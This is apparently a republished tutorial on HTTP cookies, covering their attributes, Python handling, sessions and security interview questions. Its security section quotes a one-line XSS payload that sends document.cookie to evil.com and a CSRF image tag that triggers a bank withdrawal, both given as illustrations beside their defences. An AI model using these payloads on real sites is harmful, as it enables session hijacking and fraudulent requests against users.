Comprehensive Guide to HTTP Cookies: Principles, Attributes, Python Usage, and Security
This article provides a thorough overview of HTTP cookies, covering their origin, definition, working principles, attributes, Python manipulation, session comparison, common interview questions, and associated security concerns, all illustrated with examples and code snippets.
In the previous tutorial on a Youku Danmu crawler we briefly introduced the concept of cookies; this article offers a complete understanding of HTTP cookies (small biscuits) and related knowledge.
1. Origin
HTTP is stateless, meaning the server cannot know whether two requests come from the same browser, which hinders interactive web applications. To record user actions, developers first used hidden fields, but this was cumbersome. In 1994, Netscape employee Lou Montulli introduced cookies to solve shopping‑cart history, and today all browsers support them.
2. What is a Cookie
A cookie is a piece of special information sent by the server to the client and stored as a text file on the client. Every subsequent request from the client includes this information, allowing the server to track client state.
Cookies are mainly used for:
Session state management (e.g., login status, shopping cart, game scores).
Personalized settings (e.g., user preferences, themes).
Browser behavior tracking (e.g., analytics).
3. Cookie Mechanism
Using a login example, the server validates credentials and returns a Set‑Cookie header. The browser stores the cookie and sends it back in the Cookie header on subsequent requests.
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly
[response body]Later request:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzgThe server reads the cookie to identify the logged‑in user. Because cookies are stored client‑side, they can be modified, which poses security risks. Note that cookies are always transmitted via HTTP headers.
4. Cookie Attributes
A cookie contains several attributes: Name, Value, Domain, Path, Expires/Max‑Age, Size, HttpOnly, Secure. Each attribute’s purpose is explained below.
1. Name & Value
The Name identifies the cookie; the server uses it to retrieve the corresponding Value, which often serves as a key for server‑side data.
2. Domain & Path
Domain specifies which hostnames can access the cookie (e.g., .baidu.com vs .tieba.baidu.com). Path restricts access to a specific URL path (e.g., /test).
3. Expires/Max‑Age
These define the cookie’s lifetime. If omitted, the cookie lasts for the browser session and expires when the browser is closed.
4. Size
Size is the total number of characters in the Name and Value (e.g., id=666 → size 5).
5. HttpOnly
When true, the cookie is sent only in HTTP headers and cannot be accessed via JavaScript, helping mitigate XSS attacks.
6. Secure
If set, the cookie is transmitted only over HTTPS, preventing exposure over insecure connections.
5. Manipulating Cookies with Python
5.1 Generating Cookies
After validating a username and password, a server can set a cookie in the response header. The browser then stores it automatically.
5.2 Retrieving Cookies
Using the requests library, r.cookies returns all cookies, and r.cookies.get_dict() provides them as a dictionary.
5.3 Setting Cookies for Crawling
When scraping, copy the browser’s cookie string into the request headers so the server treats the crawler as a logged‑in user.
6. Session
6.1 Origin
Because cookies are client‑side, visible, and limited in size, sessions were introduced to store user data securely on the server while using a cookie only to hold the session identifier.
6.2 What is a Session
A session is a server‑side object linked to a client via a session ID stored in a cookie. The session persists until the user logs out or the session expires.
6.3 Session Workflow
The first request creates a session and returns a session ID cookie.
Subsequent requests include the session ID cookie, allowing the server to associate requests with the stored session data.
Sessions can be implemented via cookies or URL rewriting; the cookie‑based approach is illustrated in the diagram.
7. Interview Scenarios
7.1 Cookie vs. Session
Both enable client‑server interaction.
Cookies reside on the client, are easy to forge, and less secure.
Sessions reside on the server, consuming server resources but offering better security.
Session implementation methods: Cookie and URL rewriting.
7.2 Security Issues Caused by Cookies
Session hijacking and XSS: Attackers can steal cookies via malicious scripts, e.g.,
(new Image()).src = "http://evil.com/steal?c=" + document.cookie;HttpOnly cookies mitigate this.
Cross‑Site Request Forgery (CSRF): An attacker can embed an image tag that triggers a state‑changing request using the victim’s cookie, e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">. Defenses include hidden tokens, confirmation steps, and short cookie lifetimes.
8. Summary
This article covered the fundamentals of HTTP cookies, their attributes, how to manipulate them with Python, the relationship between cookies and sessions, and common security concerns, providing a solid foundation for future web‑crawling and web‑development work.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Full-Stack Internet Architecture
Introducing full-stack Internet architecture technologies centered on Java
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
